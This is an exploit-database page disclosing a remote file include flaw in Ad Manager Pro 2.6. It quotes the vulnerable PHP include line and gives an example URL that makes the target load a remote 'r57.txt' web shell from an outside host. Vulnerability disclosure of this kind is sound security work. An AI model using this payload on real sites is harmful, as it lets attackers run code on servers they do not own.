[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ad Manager Pro 2.6 (ipath) Remote File Include Vulnerability

Author
Basti
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-525
Category
web applications
Date add
16-06-2006
Platform
unsorted
============================================================
Ad Manager Pro 2.6 (ipath) Remote File Include Vulnerability
============================================================



Ad Manager Pro 2.6 Remote File Include Vulnerability

homepage: phpwebscripts.com

Affected files: ad.php and common.php

Credit: Basti

Vulnerable Code:
if ($ipath) include($ipath.'/common.php'); else include('./common.php');

Example:
http://[site]/admanagerpro/common.php?ipath=http://site/r57.txt?




#  0day.today [2024-12-25]  #